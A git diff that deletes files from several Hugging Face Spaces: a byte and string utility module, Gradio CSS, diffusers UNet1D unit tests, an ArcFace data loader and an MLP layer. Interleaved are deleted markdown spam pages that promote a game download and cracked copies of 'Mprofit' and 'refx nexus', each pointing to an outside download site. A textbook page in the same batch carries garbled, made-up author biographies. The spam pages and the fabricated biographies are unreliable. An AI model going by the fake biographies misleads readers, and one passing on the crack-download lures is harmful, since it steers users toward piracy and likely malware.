data: - i = byteord(c) - r = r + h[(i >> 4) & 0xF] + h[i & 0xF] - return r - - -def num2binary(l, bits=32): - items = [] - binary = "" - for i in range(bits): - if l & 0x1: - binary = "1" + binary - else: - binary = "0" + binary - l = l >> 1 - if not ((i + 1) % 8): - items.append(binary) - binary = "" - if binary: - items.append(binary) - items.reverse() - assert l in (0, -1), "number doesn't fit in number of bits" - return " ".join(items) - - -def binary2num(bin): - bin = strjoin(bin.split()) - l = 0 - for digit in bin: - l = l << 1 - if digit != "0": - l = l | 0x1 - return l - - -def caselessSort(alist): - """Return a sorted copy of a list. If there are only strings - in the list, it will not consider case. - """ - - try: - return sorted(alist, key=lambda a: (a.lower(), a)) - except TypeError: - return sorted(alist) - - -def pad(data, size): - r"""Pad byte string 'data' with null bytes until its length is a - multiple of 'size'. - - >>> len(pad(b'abcd', 4)) - 4 - >>> len(pad(b'abcde', 2)) - 6 - >>> len(pad(b'abcde', 4)) - 8 - >>> pad(b'abcdef', 4) == b'abcdef\x00\x00' - True - """ - data = tobytes(data) - if size > 1: - remainder = len(data) % size - if remainder: - data += b"\0" * (size - remainder) - return data - - -def tostr(s, encoding="ascii", errors="strict"): - if not isinstance(s, str): - return s.decode(encoding, errors) - else: - return s - - -def tobytes(s, encoding="ascii", errors="strict"): - if isinstance(s, str): - return s.encode(encoding, errors) - else: - return bytes(s) - - -def bytechr(n): - return bytes([n]) - - -def byteord(c): - return c if isinstance(c, int) else ord(c) - - -def strjoin(iterable, joiner=""): - return tostr(joiner).join(iterable) - - -def bytesjoin(iterable, joiner=b""): - return tobytes(joiner).join(tobytes(item) for item in iterable) - - -if __name__ == "__main__": - import doctest, sys - - sys.exit(doctest.testmod().failed) diff --git 
a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-31d5c487.css b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-31d5c487.css deleted file mode 100644 index 5676fb86a728e49c066354dcb7dc77546110180d..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-31d5c487.css +++ /dev/null @@ -1 +0,0 @@ -.gradio-bokeh.svelte-14lyx1r.svelte-14lyx1r{display:flex;justify-content:center}.layout.svelte-14lyx1r.svelte-14lyx1r{display:flex;flex-direction:column;justify-content:center;align-items:center;width:var(--size-full);height:var(--size-full);color:var(--body-text-color)}.altair.svelte-14lyx1r.svelte-14lyx1r{display:flex;flex-direction:column;justify-content:center;align-items:center;width:var(--size-full);height:var(--size-full)}.caption.svelte-14lyx1r.svelte-14lyx1r{font-size:var(--text-sm)}.matplotlib.svelte-14lyx1r img.svelte-14lyx1r{object-fit:contain} diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-bc19ffad.css b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-bc19ffad.css deleted file mode 100644 index 12b9130ef86ebcd159cf75a369b754295aca6b4d..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-bc19ffad.css +++ /dev/null @@ -1 +0,0 @@ -.preview.svelte-1b19cri.svelte-1b19cri{display:flex;position:absolute;inset:0;flex-direction:column;z-index:var(--layer-2);backdrop-filter:blur(8px);background:var(--background-fill-primary);height:var(--size-full)}.fixed-height.svelte-1b19cri.svelte-1b19cri{min-height:var(--size-80);max-height:55vh}@media (min-width: 
1280px){.fixed-height.svelte-1b19cri.svelte-1b19cri{min-height:450px}}.preview.svelte-1b19cri img.svelte-1b19cri{width:var(--size-full);height:calc(var(--size-full) - 60px);object-fit:contain}.preview.svelte-1b19cri img.with-caption.svelte-1b19cri{height:calc(var(--size-full) - 80px)}.caption.svelte-1b19cri.svelte-1b19cri{padding:var(--size-2) var(--size-3);overflow:hidden;color:var(--block-label-text-color);font-weight:var(--weight-semibold);text-align:center;text-overflow:ellipsis;white-space:nowrap}.thumbnails.svelte-1b19cri.svelte-1b19cri{display:flex;position:absolute;bottom:0;justify-content:center;align-items:center;gap:var(--spacing-lg);width:var(--size-full);height:var(--size-14);overflow-x:scroll}.thumbnail-item.svelte-1b19cri.svelte-1b19cri{--ring-color:transparent;position:relative;box-shadow:0 0 0 2px var(--ring-color),var(--shadow-drop);border:1px solid var(--border-color-primary);border-radius:var(--button-small-radius);background:var(--background-fill-secondary);aspect-ratio:var(--ratio-square);width:var(--size-full);height:var(--size-full);overflow:clip}.thumbnail-item.svelte-1b19cri.svelte-1b19cri:hover{--ring-color:var(--color-accent);filter:brightness(1.1)}.thumbnail-item.selected.svelte-1b19cri.svelte-1b19cri{--ring-color:var(--color-accent)}.thumbnail-small.svelte-1b19cri.svelte-1b19cri{flex:none;transform:scale(.9);transition:75ms;width:var(--size-9);height:var(--size-9)}.thumbnail-small.selected.svelte-1b19cri.svelte-1b19cri{--ring-color:var(--color-accent);transform:scale(1);border-color:var(--color-accent)}.thumbnail-small.svelte-1b19cri>img.svelte-1b19cri{width:var(--size-full);height:var(--size-full);overflow:hidden;object-fit:var(--object-fit)}.grid-wrap.svelte-1b19cri.svelte-1b19cri{position:relative;padding:var(--size-2);height:var(--size-full);overflow-y:scroll}.grid-container.svelte-1b19cri.svelte-1b19cri{display:grid;position:relative;grid-template-rows:repeat(var(--grid-rows),minmax(100px,1fr));grid-template-columns:repeat(var(--gr
id-cols),minmax(100px,1fr));grid-auto-rows:minmax(100px,1fr);gap:var(--spacing-lg)}.thumbnail-lg.svelte-1b19cri>img.svelte-1b19cri{width:var(--size-full);height:var(--size-full);overflow:hidden;object-fit:var(--object-fit)}.thumbnail-lg.svelte-1b19cri:hover .caption-label.svelte-1b19cri{opacity:.5}.caption-label.svelte-1b19cri.svelte-1b19cri{position:absolute;right:var(--block-label-margin);bottom:var(--block-label-margin);z-index:var(--layer-1);border-top:1px solid var(--border-color-primary);border-left:1px solid var(--border-color-primary);border-radius:var(--block-label-radius);background:var(--background-fill-secondary);padding:var(--block-label-padding);max-width:80%;overflow:hidden;font-size:var(--block-label-text-size);text-align:left;text-overflow:ellipsis;white-space:nowrap}.icon-button.svelte-1b19cri.svelte-1b19cri{position:absolute;top:0;right:0;z-index:var(--layer-1)}.icon-buttons.svelte-1b19cri.svelte-1b19cri{display:flex;position:absolute;right:0}.icon-buttons.svelte-1b19cri a.svelte-1b19cri{margin:var(--size-1) 0} diff --git a/spaces/declare-lab/tango/diffusers/tests/models/test_models_unet_1d.py b/spaces/declare-lab/tango/diffusers/tests/models/test_models_unet_1d.py deleted file mode 100644 index b814f5f88a302c7c0bdc869ab7674c5657eee775..0000000000000000000000000000000000000000 --- a/spaces/declare-lab/tango/diffusers/tests/models/test_models_unet_1d.py +++ /dev/null @@ -1,284 +0,0 @@ -# coding=utf-8 -# Copyright 2023 HuggingFace Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
-# See the License for the specific language governing permissions and -# limitations under the License. - -import unittest - -import torch - -from diffusers import UNet1DModel -from diffusers.utils import floats_tensor, slow, torch_device - -from ..test_modeling_common import ModelTesterMixin - - -torch.backends.cuda.matmul.allow_tf32 = False - - -class UNet1DModelTests(ModelTesterMixin, unittest.TestCase): - model_class = UNet1DModel - - @property - def dummy_input(self): - batch_size = 4 - num_features = 14 - seq_len = 16 - - noise = floats_tensor((batch_size, num_features, seq_len)).to(torch_device) - time_step = torch.tensor([10] * batch_size).to(torch_device) - - return {"sample": noise, "timestep": time_step} - - @property - def input_shape(self): - return (4, 14, 16) - - @property - def output_shape(self): - return (4, 14, 16) - - def test_ema_training(self): - pass - - def test_training(self): - pass - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_determinism(self): - super().test_determinism() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_outputs_equivalence(self): - super().test_outputs_equivalence() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_save_pretrained(self): - super().test_from_save_pretrained() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_save_pretrained_variant(self): - super().test_from_save_pretrained_variant() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_model_from_pretrained(self): - super().test_model_from_pretrained() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_output(self): - super().test_output() - - def prepare_init_args_and_inputs_for_common(self): - init_dict = { - "block_out_channels": (32, 64, 128, 256), - "in_channels": 14, - "out_channels": 14, - "time_embedding_type": 
"positional", - "use_timestep_embedding": True, - "flip_sin_to_cos": False, - "freq_shift": 1.0, - "out_block_type": "OutConv1DBlock", - "mid_block_type": "MidResTemporalBlock1D", - "down_block_types": ("DownResnetBlock1D", "DownResnetBlock1D", "DownResnetBlock1D", "DownResnetBlock1D"), - "up_block_types": ("UpResnetBlock1D", "UpResnetBlock1D", "UpResnetBlock1D"), - "act_fn": "mish", - } - inputs_dict = self.dummy_input - return init_dict, inputs_dict - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_pretrained_hub(self): - model, loading_info = UNet1DModel.from_pretrained( - "bglick13/hopper-medium-v2-value-function-hor32", output_loading_info=True, subfolder="unet" - ) - self.assertIsNotNone(model) - self.assertEqual(len(loading_info["missing_keys"]), 0) - - model.to(torch_device) - image = model(**self.dummy_input) - - assert image is not None, "Make sure output is not None" - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_output_pretrained(self): - model = UNet1DModel.from_pretrained("bglick13/hopper-medium-v2-value-function-hor32", subfolder="unet") - torch.manual_seed(0) - if torch.cuda.is_available(): - torch.cuda.manual_seed_all(0) - - num_features = model.in_channels - seq_len = 16 - noise = torch.randn((1, seq_len, num_features)).permute( - 0, 2, 1 - ) # match original, we can update values and remove - time_step = torch.full((num_features,), 0) - - with torch.no_grad(): - output = model(noise, time_step).sample.permute(0, 2, 1) - - output_slice = output[0, -3:, -3:].flatten() - # fmt: off - expected_output_slice = torch.tensor([-2.137172, 1.1426016, 0.3688687, -0.766922, 0.7303146, 0.11038864, -0.4760633, 0.13270172, 0.02591348]) - # fmt: on - self.assertTrue(torch.allclose(output_slice, expected_output_slice, rtol=1e-3)) - - def test_forward_with_norm_groups(self): - # Not implemented yet for this UNet - pass - - @slow - def test_unet_1d_maestro(self): - model_id = 
"harmonai/maestro-150k" - model = UNet1DModel.from_pretrained(model_id, subfolder="unet") - model.to(torch_device) - - sample_size = 65536 - noise = torch.sin(torch.arange(sample_size)[None, None, :].repeat(1, 2, 1)).to(torch_device) - timestep = torch.tensor([1]).to(torch_device) - - with torch.no_grad(): - output = model(noise, timestep).sample - - output_sum = output.abs().sum() - output_max = output.abs().max() - - assert (output_sum - 224.0896).abs() < 4e-2 - assert (output_max - 0.0607).abs() < 4e-4 - - -class UNetRLModelTests(ModelTesterMixin, unittest.TestCase): - model_class = UNet1DModel - - @property - def dummy_input(self): - batch_size = 4 - num_features = 14 - seq_len = 16 - - noise = floats_tensor((batch_size, num_features, seq_len)).to(torch_device) - time_step = torch.tensor([10] * batch_size).to(torch_device) - - return {"sample": noise, "timestep": time_step} - - @property - def input_shape(self): - return (4, 14, 16) - - @property - def output_shape(self): - return (4, 14, 1) - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_determinism(self): - super().test_determinism() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_outputs_equivalence(self): - super().test_outputs_equivalence() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_save_pretrained(self): - super().test_from_save_pretrained() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_save_pretrained_variant(self): - super().test_from_save_pretrained_variant() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_model_from_pretrained(self): - super().test_model_from_pretrained() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_output(self): - # UNetRL is a value-function is different output shape - init_dict, inputs_dict = 
self.prepare_init_args_and_inputs_for_common() - model = self.model_class(**init_dict) - model.to(torch_device) - model.eval() - - with torch.no_grad(): - output = model(**inputs_dict) - - if isinstance(output, dict): - output = output.sample - - self.assertIsNotNone(output) - expected_shape = torch.Size((inputs_dict["sample"].shape[0], 1)) - self.assertEqual(output.shape, expected_shape, "Input and output shapes do not match") - - def test_ema_training(self): - pass - - def test_training(self): - pass - - def prepare_init_args_and_inputs_for_common(self): - init_dict = { - "in_channels": 14, - "out_channels": 14, - "down_block_types": ["DownResnetBlock1D", "DownResnetBlock1D", "DownResnetBlock1D", "DownResnetBlock1D"], - "up_block_types": [], - "out_block_type": "ValueFunction", - "mid_block_type": "ValueFunctionMidBlock1D", - "block_out_channels": [32, 64, 128, 256], - "layers_per_block": 1, - "downsample_each_block": True, - "use_timestep_embedding": True, - "freq_shift": 1.0, - "flip_sin_to_cos": False, - "time_embedding_type": "positional", - "act_fn": "mish", - } - inputs_dict = self.dummy_input - return init_dict, inputs_dict - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_pretrained_hub(self): - value_function, vf_loading_info = UNet1DModel.from_pretrained( - "bglick13/hopper-medium-v2-value-function-hor32", output_loading_info=True, subfolder="value_function" - ) - self.assertIsNotNone(value_function) - self.assertEqual(len(vf_loading_info["missing_keys"]), 0) - - value_function.to(torch_device) - image = value_function(**self.dummy_input) - - assert image is not None, "Make sure output is not None" - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_output_pretrained(self): - value_function, vf_loading_info = UNet1DModel.from_pretrained( - "bglick13/hopper-medium-v2-value-function-hor32", output_loading_info=True, subfolder="value_function" - ) - torch.manual_seed(0) - if 
torch.cuda.is_available(): - torch.cuda.manual_seed_all(0) - - num_features = value_function.in_channels - seq_len = 14 - noise = torch.randn((1, seq_len, num_features)).permute( - 0, 2, 1 - ) # match original, we can update values and remove - time_step = torch.full((num_features,), 0) - - with torch.no_grad(): - output = value_function(noise, time_step).sample - - # fmt: off - expected_output_slice = torch.tensor([165.25] * seq_len) - # fmt: on - self.assertTrue(torch.allclose(output, expected_output_slice, rtol=1e-3)) - - def test_forward_with_norm_groups(self): - # Not implemented yet for this UNet - pass diff --git a/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/face3d/models/arcface_torch/dataset.py b/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/face3d/models/arcface_torch/dataset.py deleted file mode 100644 index 96bbb8bb6da99122f350bc8e1a6390245840e32b..0000000000000000000000000000000000000000 --- a/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/face3d/models/arcface_torch/dataset.py +++ /dev/null @@ -1,124 +0,0 @@ -import numbers -import os -import queue as Queue -import threading - -import mxnet as mx -import numpy as np -import torch -from torch.utils.data import DataLoader, Dataset -from torchvision import transforms - - -class BackgroundGenerator(threading.Thread): - def __init__(self, generator, local_rank, max_prefetch=6): - super(BackgroundGenerator, self).__init__() - self.queue = Queue.Queue(max_prefetch) - self.generator = generator - self.local_rank = local_rank - self.daemon = True - self.start() - - def run(self): - torch.cuda.set_device(self.local_rank) - for item in self.generator: - self.queue.put(item) - self.queue.put(None) - - def next(self): - next_item = self.queue.get() - if next_item is None: - raise StopIteration - return next_item - - def __next__(self): - return self.next() - - def __iter__(self): - return self - - -class DataLoaderX(DataLoader): - - def __init__(self, local_rank, **kwargs): - 
super(DataLoaderX, self).__init__(**kwargs) - self.stream = torch.cuda.Stream(local_rank) - self.local_rank = local_rank - - def __iter__(self): - self.iter = super(DataLoaderX, self).__iter__() - self.iter = BackgroundGenerator(self.iter, self.local_rank) - self.preload() - return self - - def preload(self): - self.batch = next(self.iter, None) - if self.batch is None: - return None - with torch.cuda.stream(self.stream): - for k in range(len(self.batch)): - self.batch[k] = self.batch[k].to(device=self.local_rank, non_blocking=True) - - def __next__(self): - torch.cuda.current_stream().wait_stream(self.stream) - batch = self.batch - if batch is None: - raise StopIteration - self.preload() - return batch - - -class MXFaceDataset(Dataset): - def __init__(self, root_dir, local_rank): - super(MXFaceDataset, self).__init__() - self.transform = transforms.Compose( - [transforms.ToPILImage(), - transforms.RandomHorizontalFlip(), - transforms.ToTensor(), - transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]), - ]) - self.root_dir = root_dir - self.local_rank = local_rank - path_imgrec = os.path.join(root_dir, 'train.rec') - path_imgidx = os.path.join(root_dir, 'train.idx') - self.imgrec = mx.recordio.MXIndexedRecordIO(path_imgidx, path_imgrec, 'r') - s = self.imgrec.read_idx(0) - header, _ = mx.recordio.unpack(s) - if header.flag > 0: - self.header0 = (int(header.label[0]), int(header.label[1])) - self.imgidx = np.array(range(1, int(header.label[0]))) - else: - self.imgidx = np.array(list(self.imgrec.keys)) - - def __getitem__(self, index): - idx = self.imgidx[index] - s = self.imgrec.read_idx(idx) - header, img = mx.recordio.unpack(s) - label = header.label - if not isinstance(label, numbers.Number): - label = label[0] - label = torch.tensor(label, dtype=torch.long) - sample = mx.image.imdecode(img).asnumpy() - if self.transform is not None: - sample = self.transform(sample) - return sample, label - - def __len__(self): - return len(self.imgidx) - - -class 
SyntheticDataset(Dataset): - def __init__(self, local_rank): - super(SyntheticDataset, self).__init__() - img = np.random.randint(0, 255, size=(112, 112, 3), dtype=np.int32) - img = np.transpose(img, (2, 0, 1)) - img = torch.from_numpy(img).squeeze(0).float() - img = ((img / 255) - 0.5) / 0.5 - self.img = img - self.label = 1 - - def __getitem__(self, index): - return self.img, self.label - - def __len__(self): - return 1000000 diff --git a/spaces/diacanFperku/AutoGPT/DESCARGA LAST YEAR THE NIGHTMARE C V17.01.19 PARA PC [REPACK].md b/spaces/diacanFperku/AutoGPT/DESCARGA LAST YEAR THE NIGHTMARE C V17.01.19 PARA PC [REPACK].md deleted file mode 100644 index 10eb55ec016c846319b0d95f33bce8d1d1569c81..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/DESCARGA LAST YEAR THE NIGHTMARE C V17.01.19 PARA PC [REPACK].md +++ /dev/null @@ -1,37 +0,0 @@ - -

    Download Last Year The Nightmare C V17.01.19 for PC: the multiplayer horror game that will make you tremble

    - -

    Do you like horror games? Do you dare to face a ruthless killer while trying to escape with your friends? If the answer is yes, then you have to download Last Year The Nightmare C V17.01.19 for PC, the latest version of the multiplayer horror game that will make you tremble with fear.

    -

    DOWNLOAD LAST YEAR THE NIGHTMARE C V17.01.19 FOR PC


    DOWNLOAD 🆗 https://gohhs.com/2uFVdH



    - -

    Last Year The Nightmare is a cooperative horror game in which five players take on the role of survivors who must escape a map riddled with traps and dangers. But they won't be alone: another player controls one of the four available killers, each with their own abilities and weapons. The killer can shapeshift, set traps, sabotage objects, and use the environment to hunt down and eliminate the survivors.

    - -

    The game features several modes, such as Nightmare mode, in which the survivors have only one life while the killer can respawn endlessly, and Escape mode, in which the survivors must complete a series of objectives to open the exit and get out before time runs out. It also offers a wide variety of maps, such as an abandoned high school, a psychiatric hospital, and a camp in the woods.

    - -

    To download Last Year The Nightmare C V17.01.19 for PC, just follow these steps:

    - -
      -
    1. Visit the game's official Steam page and click the "Add to cart" button.
    2. Sign in with your Steam account, or create one if you don't have it yet.
    3. Pay with your preferred method and wait for the download to complete.
    4. Once the game has downloaded, open it from your Steam library and enjoy the most terrifying experience.
    - -

    Don't wait any longer: download Last Year The Nightmare C V17.01.19 for PC, the multiplayer horror game that will make you tremble. Will you manage to survive, or will you fall into the killer's clutches?

    - -

    If you want to know more about Last Year The Nightmare C V17.01.19 for PC, here are some of its standout features:

    -

    - -
      -
    • An asymmetric multiplayer horror game in which five survivors must escape a killer hunting them down.
    • Four different killers to choose from, each with their own playstyle and special abilities.
    • Several game modes and maps that deliver a varied, challenging experience.
    • A progression and customization system that lets you unlock new items, abilities, and looks for the characters.
    • Graphics and sound that plunge you into an atmosphere of terror and tension.
    - -

    Last Year The Nightmare C V17.01.19 for PC is a game you can't miss if you are a horror fan and want to share a unique experience with your friends. It will test you both as a survivor and as a killer, and you will have to use your wits, your teamwork, and your instincts to come out on top or die trying.

    - -

    What are you waiting for? Download Last Year The Nightmare C V17.01.19 for PC today and get ready to feel true terror.

    -
    -
    \ No newline at end of file diff --git a/spaces/diacanFperku/AutoGPT/Mprofit Crack Code For Windows [2021].md b/spaces/diacanFperku/AutoGPT/Mprofit Crack Code For Windows [2021].md deleted file mode 100644 index 9dc72720cd22e501c1d903ec4951b99d9af96522..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Mprofit Crack Code For Windows [2021].md +++ /dev/null @@ -1,28 +0,0 @@ - -

    Mprofit Crack Code For Windows: A Review

    -

    If you are looking for software that can help you manage your portfolio, track your investments, and file your taxes, you might have heard of Mprofit. Mprofit is a popular portfolio management tool that offers a range of features and benefits for investors and advisors. But what if you don't want to pay for the full version of Mprofit? Is there a way to get Mprofit crack code for Windows and enjoy all the benefits of the software for free?

    -

    In this article, we will review Mprofit crack code for Windows and see if it is worth downloading and installing. We will also compare it with the original Mprofit software and see what are the pros and cons of using Mprofit crack code for Windows.

    -

    Mprofit Crack Code For Windows


    Download Zip ✶✶✶ https://gohhs.com/2uFTVX



    -

    What is Mprofit?

    -

    Mprofit is portfolio management software that allows you to manage your investments, assets, liabilities, income, expenses, and taxes in one place. It supports various asset classes, such as stocks, mutual funds, bonds, fixed deposits, gold, real estate, and more. It also integrates with various online platforms, such as stock exchanges, mutual fund houses, banks, and brokers, to import your data automatically and keep it up to date.

    -

    Mprofit also helps you generate various reports and statements, such as capital gains, profit and loss, balance sheet, cash flow, asset allocation, and more. You can also export your data to Excel or PDF formats or email it directly from the software. Mprofit also helps you file your taxes by calculating your tax liability and generating tax reports.

    -

    Mprofit is available in two versions: Mprofit Pro and Mprofit Advisor. Mprofit Pro is designed for individual investors who want to manage their own portfolio. Mprofit Advisor is designed for professional advisors who want to manage multiple portfolios for their clients. Both versions have different pricing plans depending on the number of portfolios and features you need.

    -

    What is Mprofit Crack Code For Windows?

    -

    Mprofit crack code for Windows is a modified version of Mprofit software that bypasses the license verification and allows you to use the software for free. It is usually downloaded from third-party websites that claim to offer Mprofit crack code for Windows along with a download link and instructions on how to install it.

    -

    Mprofit crack code for Windows may seem like a tempting option for those who want to save money and enjoy all the features of Mprofit without paying for it. However, there are many risks and drawbacks associated with using Mprofit crack code for Windows that you should be aware of before downloading it.

    -

    What are the Risks and Drawbacks of Using Mprofit Crack Code For Windows?

    -

    Here are some of the risks and drawbacks of using Mprofit crack code for Windows:

• It may not work properly: Mprofit crack code for Windows may not be compatible with your system or may have bugs or errors that affect its performance. It may also not have all the features or updates of the original Mprofit software, or may have some features disabled or corrupted. You may not be able to import your data correctly or generate accurate reports or statements using Mprofit crack code for Windows.
• It may harm your system: Mprofit crack code for Windows may contain viruses, malware, spyware, or other harmful programs that can infect your system and compromise its security. These programs may steal your personal or financial information, damage your files or data, slow down your system, or cause other problems. You may also expose yourself to legal issues or penalties if you use pirated software.
• It may not be supported: Mprofit crack code for Windows may not have any customer support or technical assistance from the official Mprofit team. If you encounter any problems or issues with the software, you may not be able to get any help or solutions from them. You may also not be able to access any online resources or tutorials that are available for the original Mprofit software.
• It may not be ethical: Mprofit crack code for Windows may violate the intellectual property rights of the original Mprofit developers. By using pirated software, you are not respecting their hard work and creativity, and you are depriving them of their rightful income. You are also contributing to the problem of software piracy that affects the software industry and economy.

    Conclusion


    Mprofit crack code for Windows may seem like a good idea at first glance, but it is not worth the risk or hassle. It may not work properly, harm your system, lack support, or be unethical. Instead of using Mprofit crack code for Windows, you should consider buying the original Mprofit software from their official website. You can choose from different pricing plans that suit your budget and needs. You can also enjoy a free trial period before buying the software to test its features and functionality.


    Mprofit is a reliable and reputable portfolio management software that can help you manage your investments and taxes efficiently and effectively. It has many features and benefits that make it worth paying for. By buying the original Mprofit software, you can support the developers, get regular updates and support, and ensure your system's security and performance.



    -
    -
    \ No newline at end of file diff --git a/spaces/diacanFperku/AutoGPT/QuantitativeMethodsforBusiness12thedpdf NEW!.md b/spaces/diacanFperku/AutoGPT/QuantitativeMethodsforBusiness12thedpdf NEW!.md deleted file mode 100644 index 0084f31b63a5f8c9a1a73ec2ab1348434309e59a..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/QuantitativeMethodsforBusiness12thedpdf NEW!.md +++ /dev/null @@ -1,16 +0,0 @@ -

    QuantitativeMethodsforBusiness12thedpdf


Download Zip: https://gohhs.com/2uFUSW



Eileen P. Quinn, and James B. Milgram, NIST (The National Institute of Standards and Technology), Gaithersburg, MD, 1998. £375

About the Authors

David R. Anderson, Ph.D. is the Edmund L. Starling Professor of Telecommunications and an Associate Dean in the College of Engineering at the Georgia Institute of Technology. His primary research interest is the development of theory and the application of optimal control to communications. He has done over fifty years of research in the theory and applications of nonlinear systems to communications and is also known for his popular textbook on the subject, “Optimal Control of Dynamic Systems.” He has also written several popular books for the engineering general reader. He is a Fellow of the American Academy of Arts and Sciences, and a member of the National Academy of Engineering.

Dennis J. Sweeney, Ph.D. is an Associate Professor of Management at the Massachusetts Institute of Technology, specializing in the behavioral and organizational aspects of the firm. He has held postdoctoral appointments at the University of Pennsylvania and at the Massachusetts Institute of Technology, and has worked in the private sector for many years. Dr. Sweeney has published many articles in journals such as Organization Science and Management Science, and is the author of a book on the relationship between management and strategy. He is currently the editor of the Journal of the Academy of Management, and past editor of the Journal of Product and Brand Management.

Thomas A. Williams, Ph.D. is a Professor of Management and Director of the Massachusetts Institute of Technology’s Entrepreneurship Program. His research, which includes the development of measures of innovation, has been published in prestigious journals such as the Journal of Marketing Research and the Journal of Marketing, and he is a Fellow of the American Marketing Association. He has also authored four books: Entrepreneurship and the Pursuit of Happiness, The Social Ecology of Small Business, Innovative Survival, and Timescales of Progress. His current work is focused on the use of quantitative methods to study human behavior, and he is particularly interested in the connection between business performance and personal satisfaction.

Jeffrey D. Camm is an Associate Professor at the University of Wisconsin at Madison, where he teaches in the department of kinesiology and sports management. He received his doctorate in sport management from the University of Texas, and his research interests include the measurement of individual and team sports performance, the development of effective coaching techniques, and the psychology of youth sport.
    -
    -
    -

    diff --git a/spaces/diacanFperku/AutoGPT/Refx Nexus 2.3.4 BEST Crack Mega.md b/spaces/diacanFperku/AutoGPT/Refx Nexus 2.3.4 BEST Crack Mega.md deleted file mode 100644 index 9a81f18231830c32fa26ae951a59bfcb32740111..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Refx Nexus 2.3.4 BEST Crack Mega.md +++ /dev/null @@ -1,18 +0,0 @@ -

    refx nexus 2.3.4 crack mega


    Download Zip ===== https://gohhs.com/2uFSZE



refx nexus 2.3.4 crack Mega.co.nz

Although there are no torrents for the 16.04.3 ISOs, I’ve uploaded them to the Mega.co.nz website.

I’m also including all of the files that the release server includes as well. There are a lot of images, including a custom Linux Mint installation ISO that you can use to upgrade or download just the new release ISO files.

The download links are provided on the main page as well as the Torrent link. I’ll be continuing to update these links as more information becomes available.

refx nexus 2.3.4 crack
    -
    -
    -

    diff --git a/spaces/diaoren/OpenSetObstacleDetection/opendet2/modeling/layers/mlp.py b/spaces/diaoren/OpenSetObstacleDetection/opendet2/modeling/layers/mlp.py deleted file mode 100644 index aa714d0a9ce96eb8523f3cd378604e26b361f127..0000000000000000000000000000000000000000 --- a/spaces/diaoren/OpenSetObstacleDetection/opendet2/modeling/layers/mlp.py +++ /dev/null @@ -1,46 +0,0 @@ -import torch -import torch.nn as nn -import torch.nn.functional as F -import fvcore.nn.weight_init as weight_init - - -class MLP(nn.Module): - def __init__(self, in_dim, out_dim, hidden_dim=None): - super().__init__() - if not hidden_dim: - hidden_dim = in_dim - self.head = nn.Sequential( - nn.Linear(in_dim, hidden_dim), - nn.ReLU(inplace=True), - nn.Linear(hidden_dim, out_dim), - ) - for layer in self.head: - if isinstance(layer, nn.Linear): - weight_init.c2_xavier_fill(layer) - - def forward(self, x): - feat = self.head(x) - feat_norm = F.normalize(feat, dim=1) - return feat_norm - - -class ConvMLP(nn.Module): - def __init__(self, in_dim, out_dim, hidden_dim=None): - super().__init__() - if not hidden_dim: - hidden_dim = in_dim - self.head = nn.Sequential( - nn.Conv2d(in_dim, hidden_dim, kernel_size=3, stride=1, padding=1), - nn.ReLU(inplace=True), - nn.Conv2d(hidden_dim, out_dim, kernel_size=3, stride=1, padding=1), - ) - # Initialization - for layer in self.head: - if isinstance(layer, nn.Conv2d): - torch.nn.init.normal_(layer.weight, mean=0, std=0.01) - torch.nn.init.constant_(layer.bias, 0) - - def forward(self, x): - feat = self.head(x) - feat_norm = F.normalize(feat, dim=1) - return feat_norm \ No newline at end of file diff --git a/spaces/diego2554/RemBG_super/rembg/sessions/u2net.py b/spaces/diego2554/RemBG_super/rembg/sessions/u2net.py deleted file mode 100644 index e984b182d87ac4e2357478c2a6f55e445cf2f721..0000000000000000000000000000000000000000 --- a/spaces/diego2554/RemBG_super/rembg/sessions/u2net.py +++ /dev/null @@ -1,51 +0,0 @@ -import os -from typing import List - 
